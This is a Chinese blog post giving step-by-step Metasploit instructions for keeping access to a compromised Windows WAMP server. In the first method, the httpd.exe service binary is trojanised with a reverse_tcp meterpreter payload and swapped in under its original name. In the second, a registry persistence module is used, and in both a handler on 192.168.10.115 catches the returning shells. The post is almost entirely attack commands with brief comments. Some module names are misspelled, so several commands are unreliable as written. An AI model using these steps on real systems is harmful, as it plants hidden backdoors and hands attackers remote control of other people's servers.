美文网首页
0x07 安装后门

0x07 安装后门

作者: Gatociego | 来源:发表于2018-12-06 17:43 被阅读0次

    一 在守护进行执行文件中注入后门

    在获得meterpreter1之后安装后门的步骤

    # 查看系统中有哪些进程,查看在哪些守护进程中安装后门
    # 这里使用的服务器是wamp
    ps -S httpd.exe
    
    # 停止http服务进程
    pkill httpd.exe
    
    # 寻找改进程执行文件的位置
    search -f httpd.exe -d C:\
    
    # 下载该服务的执行文件
    download C:\\httpd.exe
    
    # 然后将meterpreter1放入后台
    background
    

    在服务器执行文件上安装后门

    # 从meterpreter1返回到msfconsole
    # 在服务执行文件上安装后门,默认端口4444
    use payload/windows/x64/metepreter/reverse_tcp #后门上安装的shell
    set lhost 192.168.10.115
    generate -a x64 -p Windows -x httpd.exe -k -t exe -f http_backdoor.exe
    后门制作结束
    generate
    -a 处理器架构
    -p 操作系统平台
    -x 后台使用的模板
    -t 文件格式
    -f 生成的后门文件
    

    准备接受后台反弹的shell

    use exploit/mulit/handler
    set payload payload/windows/x64/metepreter/reverse_tcp # payload需要与后门上安装的相同
    set lhost 192.168.10.115 #后门的shell只会发往115
    exploit -j   # -j 允许在后台持续监听
    

    进入meterpreter1安装后门

    # 切换到服务执行文件所在的目录
    cd C:\
    
    # 将原始的服务执行文件备份
    mv httpd.exe httpd-backup.exe
    
    # 上传制作的后门文件
    upload http_backdoor.exe
    
    # 将后门文件更改为原先的名字
    mv http_backdoor.exe httpd.exe
    
    # 切换到目标机器的system sheel
    shell
    
    # 这个httpd是wampapache服务器的,停止wampapache,在开启wampapache
    net stop wampapache
    net start wampapache   #会直接启动httpd.exe
    
    # 执行之后,系统就接受到了
    

    二 在注册表中安装后门

    # 前提要有一个meterpreter,这个meterpreter放入后天,假设session值为1
     use exploit/windows/local/registry_persistence 
    set session 1 #目的是当前需要一个shell能够操作目标机器的注册表
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.10.115
    exploit
    
    # 需要在攻击机上监听可能返回的shell
    use exploit/muilt/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.10.115
    run -j  #进入后台监听
    

    还有几个

    相关文章

      网友评论

          本文标题:0x07 安装后门

          本文链接:https://www.haomeiwen.com/subject/ehiocqtx.html